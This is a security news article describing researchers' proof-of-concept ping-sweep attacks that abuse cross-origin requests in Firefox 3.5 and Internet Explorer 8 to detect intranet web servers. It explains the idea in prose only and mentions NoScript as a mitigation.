Firefox 3.5 and IE8 Abused to Spy Inside Intranets

Two security researchers have devised proof-of-concept "ping sweeping" attacks, which leverage on the new Cross-Origin Resource Sharing implementation in Firefox 3.5, as well as the one already existing in Internet Explorer 8. A design weakness can allow attackers to remotely map Web servers on an internal network by using HTTP requests as pings.

XMLHttpRequest is a common API used in AJAX libraries in order to send HTTP requests directly to web servers and return the results as XML or plain text directly into the scripting language. In previous browser implementations, XMLHttpRequest was limited by the JavaScript same origin policy, meaning that HTTP or HTTPS requests could only be sent by an application to the domain that loaded it.

All of that changed with the introduction of the Cross-Origin Resource Sharing (CORS) specification, which allows such requests to be made cross-site. For security purposes, the specification requires the exchange of specific headers, which servers can use to enforce origin-domain restrictions.

However, as reputed Web security researcher Robert "RSnake" Hansen points out, even if such resource-accessing restrictions are put in place, the ability to make the request itself can be abused. "Although an attacker is not allowed to know if the page was there or not (only if it was allowed to see the content or not), the attacker is still allowed to make an initial request. In doing so that initial request can be used as a pseudo 'ping' sweep," he explains.

Obviously, this is not a real ICMP ping, but an HTTP variant, which can still be used to "tell if the site is there or not because it will either return immediately […] or it will wait around much longer […] before the browser gives up." By leveraging on this architectural weak spot, Hansen claims that a "substantial amount of internal address space" can be scanned for web servers rather quickly.

In order to support his theory, the researcher has created a PoC example, which scans a limited number of intranet IP addresses if the client visiting the page is behind a local router. It is also worth mentioning that port 80 does not necessarily have to be opened in order for this attack to work.

Fortunately, the popular NoScript Firefox extension can be used to mitigate the issue, because of its ABE (Application Boundaries Enforcer) component. Disabling JavaScript globally, something which NoScript does by default, will also block such attacks.

However, Internet Explorer 8 has its own proprietary variant of XMLHttpRequest too. It is called XDomainRequest and is implemented using the same Cross-Origin Resource Sharing specification. Inspired by RSnake's idea, another application security researcher, going by the online handle of Inferno, has devised a similar attack against Microsoft's browser.